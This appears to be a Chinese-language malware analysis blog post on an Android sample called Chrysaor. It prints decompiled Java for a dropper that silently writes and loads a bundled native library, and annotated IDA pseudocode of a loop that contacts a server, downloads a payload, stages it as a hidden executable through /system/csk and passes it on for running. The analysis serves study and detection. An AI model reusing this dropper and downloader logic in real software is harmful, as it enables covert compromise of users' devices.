android malware


来源:
https://github.com/fs0c131y/Android-Malwares/tree/c897dff1796c9cb7f19104e9ce3546d54cd55a45/Chrysaor/

3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86

用JEB看是这样一个结构
先看manifest发现用到了超多权限,然后入口是这里
这里写图片描述
这里写图片描述
反编译得到其Java代码

package com.network.android;

import android.app.Activity;
import android.os.Bundle;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

/**
 * Decompiled entry Activity of the sample (see the SHA-256 above).
 *
 * Role: a minimal dropper. On creation it copies the bundled asset
 * {@code libsgn.so} to a hard-coded path inside the app's private data
 * directory, loads it with {@link System#load(String)} (which runs the
 * library's {@code JNI_OnLoad}), swallows every error, and immediately
 * calls {@link #finish()} — so no UI is ever shown.
 *
 * Indicators visible in this block: asset name {@code libsgn.so}, drop path
 * {@code /data/data/com.network.android/libsgn.so}, package name
 * {@code com.network.android}. The file is written as a regular file and
 * {@code System.load} is called on it directly; everything else (the
 * native side) is outside this block.
 *
 * Decompiler artifacts are left untouched: the three catch clauses
 * ({@code Throwable}, then {@code Exception}, then {@code IOException}) are
 * ordered broadest-first, which javac would reject as already caught; in the
 * binary they are simply three empty handlers.
 */
public class NetworkMain extends Activity {
    public NetworkMain() {
        super();
    }

    /**
     * Drops and loads the native payload, then finishes the Activity.
     *
     * @param arg8 saved instance state passed through to {@code super.onCreate}; not read here
     */
    protected void onCreate(Bundle arg8) {
        super.onCreate(arg8);
        // Hard-coded destination in the app's own data directory (no external storage needed).
        String v2 = "/data/data/com.network.android/libsgn.so";
        try {
            // Source is an APK asset, i.e. the payload ships inside the package itself.
            InputStream v1 = this.getResources().getAssets().open("libsgn.so");
            // Sizes the buffer by available() and does a single read(); for an asset stream this
            // happens to work, but nothing checks that the whole file was read.
            byte[] v0 = new byte[v1.available()];
            v1.read(v0);
            // Intermediate ByteArrayOutputStream is redundant (likely a decompiler/obfuscation artifact).
            ByteArrayOutputStream v3 = new ByteArrayOutputStream();
            v3.write(v0);
            v3.close();
            v1.close();
            FileOutputStream v4 = new FileOutputStream(v2);
            v3.writeTo(((OutputStream)v4));
            ((OutputStream)v4).close();
            // Loading the freshly written library transfers control to its JNI_OnLoad
            // (the native analysis below starts there).
            System.load(v2);
        }
        catch(Throwable v5) {
            // All failures are silently ignored: the dropper never surfaces an error.
        }
        catch(Exception v5_1) {
        }
        catch(IOException v5_2) {
        }
        // Finish immediately: the Activity exists only to run the code above.
        this.finish();
    }
}

发现并没有界面,直接将assets目录下的.so写入android的这个路径
/data/data/com.network.android/libsgn.so,然后用

System.load()

加载.so,然后就得转战IDA了。
然而并不会分析,只能看一堆strings
这里写图片描述
哦对了可以看一下JNI_OnLoad()
这里写图片描述
发现它调用了fork()然后main()!
看到main的代码很牛啊,然而很多不懂的函数

/*
 * IDA pseudocode of main() in the dropped native library (reached from
 * JNI_OnLoad() via fork(), per the write-up above). Decompiler output is kept
 * verbatim, only comments are added; helper names (socket_connect,
 * http_send_request_with_get, write_buffer_as_executable, ...) are the
 * analyst's/IDA's labels, so what they do is inferred from the names and
 * should be confirmed in the disassembly.
 *
 * Observable behaviour of this function:
 *   - waits 30 s, then loops forever;
 *   - each iteration: connect to SERVERS, send a GET carrying two hex-MD5
 *     strings (one random, one derived from the MAC address), receive a
 *     payload into a heap buffer;
 *   - writes the payload to disk as an executable under the app data dir,
 *     and if /system/csk exists, stages it via that helper into
 *     /mnt/obb/.coldboot_init with mode 711;
 *   - hands the resulting path to sub_1CF4(); on success the thread exits,
 *     otherwise it sleeps g_sleep_time_in_seconds and retries.
 *
 * Detection-relevant artifacts visible here: the fixed 30 s pre-beacon delay,
 * the file paths /data/data/com.network.android/.coldboot_init and
 * /mnt/obb/.coldboot_init, the dependency on /system/csk, and the
 * "chmod 711" executed through it.
 */
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  void *v3; // r0@1
  int v4; // r5@2          -- per-iteration success flag; 1 => exit the loop via pthread_exit
  int v5; // r7@6          -- copy of the received payload length
  void *v6; // r5@7        -- copy of the received payload pointer
  char *v7; // r0@12       -- snprintf destination (always &s)
  const char *v8; // r2@12 -- snprintf format (always "%s")
  const char *v9; // r3@12 -- path of the written executable
  char *v10; // [sp+0h] [bp-4A0h]@0  -- passed to snprintf before being set (decompiler artifact; "%s" consumes only v9)
  char *v11; // [sp+4h] [bp-49Ch]@0  -- same as v10
  int v12; // [sp+Ch] [bp-494h]@7    -- copy of the socket descriptor
  char *v13; // [sp+10h] [bp-490h]@7 -- copy of SERVERS
  int v14; // [sp+1Ch] [bp-484h]@1   -- socket descriptor (out-param of socket_connect)
  int v15; // [sp+20h] [bp-480h]@1   -- received payload length (out-param of http_receive_payload)
  void *ptr; // [sp+24h] [bp-47Ch]@1 -- received payload buffer, freed at LABEL_18
  int v17; // [sp+28h] [bp-478h]@7   -- out-param of file_exists("/system/csk"): nonzero => helper present
  char v18; // [sp+2Ch] [bp-474h]@1  -- 13-byte buffer filled by get_mac_address
  char v19; // [sp+3Ch] [bp-464h]@1  -- 33-byte buffer: random hexlified MD5
  char v20; // [sp+60h] [bp-440h]@1  -- 33-byte buffer: hexlified MD5 of the first 12 bytes of v18
  char s; // [sp+84h] [bp-41Ch]@1    -- 1024-byte buffer: path handed to sub_1CF4
  int v22; // [sp+484h] [bp-1Ch]@1   -- stack canary copy (_stack_chk_guard)

  v14 = 0;
  v15 = 0;
  v22 = _stack_chk_guard;
  ptr = 0;
  memset(&s, 0, 0x400u);
  memset(&v19, 0, 0x21u);
  memset(&v18, 0, 0xDu);
  v3 = memset(&v20, 0, 0x21u);
  handle_signals(v3);
  // Fixed 30 s delay before the first network contact; the same value is the retry interval below.
  g_sleep_time_in_seconds = 30;
  sleep(0x1Eu);
  geteuid(); // result discarded here (decompiler shows no use of it)
  while ( 1 )
  {
    v4 = 0;
    if ( socket_connect(&v14, SERVERS, unk_600C) == 1 )
    {
      // Two identifiers are built per request: a random MD5 (v19) and an MD5 over
      // the MAC-address buffer (v20) — presumably session and device identifiers.
      get_random_hexlified_md5(&v19);
      get_mac_address(&v18);
      get_hexlified_md5(&v18, &v20, 12);
      if ( http_send_request_with_get(&v20, &v19, SERVERS, v14) == 1 && http_receive_payload(v14, &ptr, &v15) == 1 )
      {
        // Reconnect after the download; the second connection is what sub_1CF4 receives (v12).
        socket_disconnect(&v14);
        if ( socket_connect(&v14, SERVERS, unk_600C) == 1 )
        {
          v5 = v15;
          v4 = 1;
          // Note: an empty payload (v15 == 0) leaves v4 == 1, so the loop exits without writing anything.
          if ( v15 > 0 )
          {
            v12 = v14;
            v6 = ptr;
            v13 = SERVERS;
            v17 = 0;
            if ( file_exists("/system/csk", &v17) != 1 )
              goto LABEL_17;
            if ( v17 )
            {
              // /system/csk is present: write the payload into the app data dir, then use
              // /system/csk to copy it to /mnt/obb and make it executable (711).
              if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1
                || system("/system/csk \"cat /data/data/com.network.android/.coldboot_init > /mnt/obb/.coldboot_init\"") == -1
                || system("/system/csk \"chmod 711 /mnt/obb/.coldboot_init\"") == -1 )
              {
LABEL_17:       // shared failure path: clear the flag and fall through to cleanup
                v4 = 0;
                goto LABEL_18;
              }
              // Remove the staging copy; only the /mnt/obb copy remains on disk.
              unlink("/data/data/com.network.android/.coldboot_init");
              v7 = &s;
              v8 = "%s";
              v9 = "/mnt/obb/.coldboot_init";
            }
            else
            {
              // No /system/csk: run the payload directly from the app data dir.
              if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1 )
                goto LABEL_17;
              v7 = &s;
              v8 = "%s";
              v9 = "/data/data/com.network.android/.coldboot_init";
            }
            // Copies the chosen path into s (0x3FF keeps a terminating NUL in the 0x400 buffer).
            if ( snprintf(v7, 0x3FFu, v8, v9, v10, v11) <= 0 )
              goto LABEL_17;
            v10 = &v19;
            v11 = v13;
            // sub_1CF4 gets: the live socket, the executable's path, the /system/csk flag and
            // the device-MD5 string. Its body is not on this page — what it does with the file
            // (presumably executes it) must be confirmed in the disassembly.
            v4 = sub_1CF4(v12, &s, v17, &v20);
            if ( v4 != 1 )
              goto LABEL_17;
          }
        }
      }
    }
LABEL_18:
    // Cleanup for every iteration, success or failure.
    if ( ptr )
    {
      free(ptr);
      ptr = 0;
    }
    socket_disconnect(&v14);
    // Success ends this thread; failure sleeps and beacons again (no retry limit).
    if ( v4 == 1 )
      pthread_exit(0);
    sleep(g_sleep_time_in_seconds);
  }
}